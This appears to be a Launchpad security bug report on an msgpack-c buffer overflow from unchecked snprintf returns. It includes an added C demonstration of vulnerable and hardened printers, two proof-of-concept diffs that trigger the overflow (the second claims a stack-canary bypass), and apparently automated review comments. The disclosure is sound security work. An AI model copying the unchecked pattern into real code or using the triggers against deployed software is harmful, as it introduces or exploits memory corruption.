buffer overflow in msgpack_object_print_buffer

Bug #1861448 reported by ddaa on 2020-01-30
Affects: msgpack-c (Ubuntu)
Importance: Undecided
Assigned to: Unassigned

Bug Description

`msgpack_object_print_buffer` didn't check the return value of `snprintf`; this causes a buffer overflow when printing an array (or a map) that contains multiple objects.

The official project fixed the problem in version 3.2.1.
https://github.com/msgpack/msgpack-c/issues/774

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: libmsgpackc2 2.1.5-1
ProcVersionSignature: Ubuntu 4.15.0-55.60-generic 4.15.18
Uname: Linux 4.15.0-55-generic x86_64
ApportVersion: 2.20.9-0ubuntu7.7
Architecture: amd64
Date: Thu Jan 30 18:54:19 2020
Dependencies:
 gcc-8-base 8.3.0-6ubuntu1~18.04.1
 libc6 2.27-3ubuntu1
 libgcc1 1:8.3.0-6ubuntu1~18.04.1
InstallationDate: Installed on 2018-01-11 (749 days ago)
InstallationMedia: Ubuntu-Server 16.04.3 LTS "Xenial Xerus" - Release amd64 (20170801)
ProcEnviron:
 TERM=xterm-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: msgpack-c
UpgradeStatus: Upgraded to bionic on 2019-06-05 (239 days ago)
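The defect the report describes, reduced to its pattern in an added example that is not msgpack-c's code: a routine that prints a list into a caller-supplied buffer with one `snprintf` call per element, advancing a cursor by each call's return value. `snprintf` returns the length the output would have had, not the length it wrote, so after the first truncated call the unchecked version moves its cursor past the end of the buffer, its `size_t` remaining-space counter wraps, and every later call writes out of bounds; the checked version treats `ret < 0 || ret >= left` as "did not fit" and stops. The `print_array_*` functions, the `LOGICAL_SIZE`/`BACKING_SIZE` guard arrangement, the `cap()` clamp (only there so libcs that reject sizes above `INT_MAX` follow the same path as glibc) and the sample values are all constructed for the illustration; the guard region exists so the overrun can be observed rather than crash the process.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <limits.h>

/* Added illustration of the defect class in the report, not msgpack-c's code.
 * Both printers write an int array as "[1, 2, 3]" into a caller-supplied
 * buffer one snprintf call at a time, the same cursor-advancing shape that
 * msgpack_object_print_buffer uses for arrays and maps. */

#define LOGICAL_SIZE 16   /* capacity the caller tells the printer it has */
#define BACKING_SIZE 256  /* real storage, so the overrun is observable, not fatal */
#define GUARD_BYTE   0x5A

typedef int (*print_fn)(char *buf, size_t size, const int *v, size_t n);

/* Keeps libcs that reject sizes above INT_MAX on the same path as glibc once
 * `left` has wrapped; it does nothing to stop the out-of-bounds write. */
static size_t cap(size_t left)
{
    return left > INT_MAX ? INT_MAX : left;
}

/* Vulnerable shape: the cursor is advanced by snprintf's return value without
 * checking that the output fit. One truncated call pushes `p` past the end
 * and wraps `left` (size_t), so every later call writes beyond the buffer. */
static int print_array_unchecked(char *buf, size_t size, const int *v, size_t n)
{
    char *p = buf;
    size_t left = size;
    int ret;

    ret = snprintf(p, cap(left), "[");
    p += ret;
    left -= ret;
    for (size_t i = 0; i < n; i++) {
        ret = snprintf(p, cap(left), "%s%d", i ? ", " : "", v[i]);
        p += ret;
        left -= ret;
    }
    ret = snprintf(p, cap(left), "]");
    p += ret;
    return (int)(p - buf);  /* length the caller is told was written */
}

/* Hardened shape: ret < 0 or ret >= left means "did not fit"; stop and report
 * truncation. The cursor never passes the end and the buffer stays
 * NUL-terminated. Returns the length on success, -1 on truncation or error. */
static int print_array_checked(char *buf, size_t size, const int *v, size_t n)
{
    char *p = buf;
    size_t left = size;
    int ret;

    if (size == 0)
        return -1;
    ret = snprintf(p, left, "[");
    if (ret < 0 || (size_t)ret >= left)
        return -1;
    p += ret;
    left -= ret;
    for (size_t i = 0; i < n; i++) {
        ret = snprintf(p, left, "%s%d", i ? ", " : "", v[i]);
        if (ret < 0 || (size_t)ret >= left)
            return -1;
        p += ret;
        left -= ret;
    }
    ret = snprintf(p, left, "]");
    if (ret < 0 || (size_t)ret >= left)
        return -1;
    p += ret;
    return (int)(p - buf);
}

/* Constructed sample: four 7-digit values, 36 characters once printed, so a
 * 16-byte buffer truncates in the middle of the second element. */
static const int SAMPLE[] = {1000000, 2000000, 3000000, 4000000};
#define SAMPLE_LEN (sizeof SAMPLE / sizeof SAMPLE[0])

/* Run a printer on a LOGICAL_SIZE-byte buffer that really sits inside
 * BACKING_SIZE bytes of guard pattern. Stores the printer's return value in
 * *ret_out (if given) and returns 1 if any byte past LOGICAL_SIZE changed. */
static int overran_guard(print_fn fn, int *ret_out)
{
    char backing[BACKING_SIZE];
    memset(backing, GUARD_BYTE, sizeof backing);
    int ret = fn(backing, LOGICAL_SIZE, SAMPLE, SAMPLE_LEN);
    if (ret_out)
        *ret_out = ret;
    for (size_t i = LOGICAL_SIZE; i < BACKING_SIZE; i++)
        if ((unsigned char)backing[i] != GUARD_BYTE)
            return 1;
    return 0;
}

static int reported_length(print_fn fn)
{
    int ret;
    overran_guard(fn, &ret);
    return ret;
}

/* With enough room the checked printer produces the complete text. */
static int checked_full_output_ok(void)
{
    char out[64];
    int ret = print_array_checked(out, sizeof out, SAMPLE, SAMPLE_LEN);
    return ret == 36 && strcmp(out, "[1000000, 2000000, 3000000, 4000000]") == 0;
}

int main(void)
{
    int ret, bad;
    bad = overran_guard(print_array_unchecked, &ret);
    printf("unchecked: returned %d, wrote past the buffer: %s\n", ret, bad ? "yes" : "no");
    bad = overran_guard(print_array_checked, &ret);
    printf("checked:   returned %d, wrote past the buffer: %s\n", ret, bad ? "yes" : "no");
    printf("checked, 64-byte buffer: %s\n", checked_full_output_ok() ? "full output" : "unexpected");
    return 0;
}
```

The unchecked printer reports 36 bytes "written" into a 16-byte buffer and leaves its output scattered past the end; the checked printer returns -1 for the same call and touches nothing beyond `LOGICAL_SIZE`. The `ret >= left` test (not `>`) is the part most often forgotten: a return equal to the remaining space means the terminating NUL displaced the last character.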

ddaa (0xddaa) wrote :

Proof of concept:
(http://github.com/msgpack/msgpack-c)

diff --git a/example/c/user_buffer_unpack.c b/example/c/user_buffer_unpack.c
index 646a9f67..041d8983 100644
--- a/example/c/user_buffer_unpack.c
+++ b/example/c/user_buffer_unpack.c
@@ -2,7 +2,7 @@
 #include <stdio.h>
 #include <assert.h>

-#define UNPACKED_BUFFER_SIZE 2048
+#define UNPACKED_BUFFER_SIZE 64

 void prepare(msgpack_sbuffer* sbuf) {
     msgpack_packer pk;
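Review bot: the cut of `UNPACKED_BUFFER_SIZE` from 2048 to 64 is the step that makes the overflow reachable, yet the hunk carries no explanation at the `#define`; add a comment there stating that 64 is deliberately smaller than the printed form of the array built in `prepare`, so that nobody reading the example later takes it for a reasonable default.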
@@ -12,8 +12,8 @@ void prepare(msgpack_sbuffer* sbuf) {
     msgpack_pack_array(&pk, 3);
     msgpack_pack_int(&pk, 1);
     msgpack_pack_true(&pk);
- msgpack_pack_str(&pk, 7);
- msgpack_pack_str_body(&pk, "example", 7);
+ msgpack_pack_str(&pk, 64);
+ msgpack_pack_str_body(&pk, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 64);
     /* 2nd object */
     msgpack_pack_str(&pk, 6);
     msgpack_pack_str_body(&pk, "second", 6);
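Review bot: the length 64 passed to `msgpack_pack_str` and the 64-character literal passed to `msgpack_pack_str_body` must agree, and a miscount produces a malformed message rather than the overflow this proof of concept is about; declare the body once (`static const char body[] = "aaaa...";`) and pass `sizeof body - 1` to both calls so the pairing is checkable without counting characters by hand. With the 64-byte `UNPACKED_BUFFER_SIZE` from the previous hunk, this one element is already as long as the whole buffer, which is worth stating in a comment.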

ddaa (0xddaa) wrote :

Proof of concept 2:
The stack canary check can be bypassed if the length of the data is controllable.

diff --git a/example/c/user_buffer_unpack.c b/example/c/user_buffer_unpack.c
index 646a9f67..75710638 100644
--- a/example/c/user_buffer_unpack.c
+++ b/example/c/user_buffer_unpack.c
@@ -2,7 +2,7 @@
 #include <stdio.h>
 #include <assert.h>

-#define UNPACKED_BUFFER_SIZE 2048
+#define UNPACKED_BUFFER_SIZE 64

 void prepare(msgpack_sbuffer* sbuf) {
     msgpack_packer pk;
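Review bot: this hunk is the same `UNPACKED_BUFFER_SIZE` 2048 to 64 change as in the first proof of concept; if the two diffs are meant to be applied independently, say so in the comment, because applying this one on top of the first will fail at this hunk since the `-#define UNPACKED_BUFFER_SIZE 2048` line it expects no longer exists.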
@@ -12,8 +12,8 @@ void prepare(msgpack_sbuffer* sbuf) {
     msgpack_pack_array(&pk, 3);
     msgpack_pack_int(&pk, 1);
     msgpack_pack_true(&pk);
- msgpack_pack_str(&pk, 7);
- msgpack_pack_str_body(&pk, "example", 7);
+ msgpack_pack_str(&pk, 64+16);
+ msgpack_pack_str_body(&pk, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 64+16);
     /* 2nd object */
     msgpack_pack_str(&pk, 6);
     msgpack_pack_str_body(&pk, "second", 6);
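Review bot: `64+16` appears twice with no name; the 64 is `UNPACKED_BUFFER_SIZE` from the first hunk and the 16 is how far the string overshoots it, which is exactly the quantity the comment above the diff is about, so define it once (`#define OVERSHOOT 16`) and pass `UNPACKED_BUFFER_SIZE + OVERSHOOT` to both calls. As in the first proof of concept, tie the 80-character literal to the length argument with `sizeof` rather than a hand count.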

information type: Private Security → Public Security
Changed in msgpack-c (Ubuntu):
status: New → Confirmed